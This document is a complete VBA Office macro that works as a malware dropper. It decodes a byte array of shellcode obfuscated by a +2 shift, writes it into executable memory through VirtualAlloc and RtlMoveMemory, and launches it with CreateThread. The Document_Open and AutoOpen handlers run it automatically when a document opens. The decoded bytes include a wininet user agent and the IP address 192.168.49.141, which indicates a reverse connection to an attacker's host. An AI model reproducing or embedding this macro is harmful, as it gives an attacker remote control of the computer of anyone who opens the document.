Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr

Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr

Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr


Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long


    buf = Array(234, 145, 2, 2, 2, 98, 51, 212, 139, 231, 102, 141, 84, 50, 141, 84, 14, 141, 84, 22, 51, 1, 141, 116, 42, 17, 185, 76, 40, 51, 194, 174, 62, 99, 126, 4, 46, 34, 195, 209, 15, 3, 201, 75, 119, 241, 84, 141, 84, 18, _
89, 141, 68, 62, 3, 210, 141, 66, 122, 135, 194, 118, 78, 3, 210, 141, 90, 34, 3, 213, 82, 141, 74, 26, 135, 203, 118, 62, 75, 51, 1, 141, 54, 141, 3, 216, 51, 194, 174, 195, 209, 15, 3, 201, 58, 226, 119, 246, 5, 127, _
250, 61, 127, 38, 119, 226, 90, 141, 90, 38, 3, 213, 104, 141, 14, 77, 141, 90, 30, 3, 213, 141, 6, 141, 3, 210, 139, 70, 38, 38, 93, 93, 99, 91, 92, 83, 1, 226, 90, 97, 92, 141, 20, 235, 130, 1, 1, 1, 95, 106, _
112, 103, 118, 2, 106, 121, 107, 112, 107, 86, 106, 78, 121, 40, 9, 1, 215, 51, 221, 85, 85, 85, 85, 85, 234, 64, 2, 2, 2, 79, 113, 124, 107, 110, 110, 99, 49, 55, 48, 50, 34, 42, 89, 107, 112, 102, 113, 121, 117, 34, _
80, 86, 34, 56, 48, 51, 61, 34, 86, 116, 107, 102, 103, 112, 118, 49, 57, 48, 50, 61, 34, 116, 120, 60, 51, 51, 48, 50, 43, 34, 110, 107, 109, 103, 34, 73, 103, 101, 109, 113, 2, 106, 60, 88, 123, 169, 1, 215, 85, 85, _
108, 5, 85, 85, 106, 189, 3, 2, 2, 234, 27, 3, 2, 2, 49, 97, 58, 112, 54, 84, 88, 97, 54, 76, 68, 99, 69, 74, 113, 79, 104, 54, 58, 113, 70, 79, 121, 103, 73, 90, 107, 124, 114, 91, 55, 112, 120, 119, 83, 111, _
109, 120, 113, 110, 71, 72, 99, 79, 123, 114, 107, 82, 85, 88, 100, 85, 75, 113, 84, 51, 105, 67, 54, 119, 104, 120, 123, 114, 47, 67, 103, 115, 110, 114, 99, 86, 101, 82, 103, 103, 120, 109, 76, 103, 77, 121, 116, 108, 100, 89, _
123, 86, 53, 121, 111, 103, 119, 81, 119, 90, 110, 87, 91, 72, 97, 117, 70, 92, 89, 99, 72, 91, 84, 59, 70, 71, 112, 85, 53, 77, 88, 82, 70, 59, 81, 121, 79, 58, 91, 68, 53, 83, 105, 53, 105, 111, 68, 71, 118, 91, _
79, 2, 82, 106, 89, 139, 161, 200, 1, 215, 139, 200, 85, 106, 2, 52, 234, 134, 85, 85, 85, 89, 85, 88, 106, 237, 87, 48, 61, 1, 215, 152, 108, 12, 97, 106, 130, 53, 2, 2, 139, 226, 108, 6, 82, 108, 33, 88, 106, 119, _
72, 160, 136, 1, 215, 85, 85, 85, 85, 88, 106, 47, 8, 26, 125, 1, 215, 135, 194, 119, 22, 106, 138, 21, 2, 2, 106, 70, 242, 55, 226, 1, 215, 81, 119, 207, 234, 77, 2, 2, 2, 108, 66, 106, 2, 18, 2, 2, 106, 2, _
2, 66, 2, 85, 106, 90, 166, 85, 231, 1, 215, 149, 85, 85, 139, 233, 89, 106, 2, 34, 2, 2, 85, 88, 106, 20, 152, 139, 228, 1, 215, 135, 194, 118, 209, 141, 9, 3, 197, 135, 194, 119, 231, 90, 197, 97, 234, 109, 1, 1, _
1, 51, 59, 52, 48, 51, 56, 58, 48, 54, 59, 48, 51, 54, 51, 2, 189, 226, 31, 44, 12, 106, 168, 151, 191, 159, 1, 215, 62, 8, 126, 12, 130, 253, 226, 119, 7, 189, 73, 21, 116, 113, 108, 2, 85, 1, 215)
    
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter) - 2
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    

    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
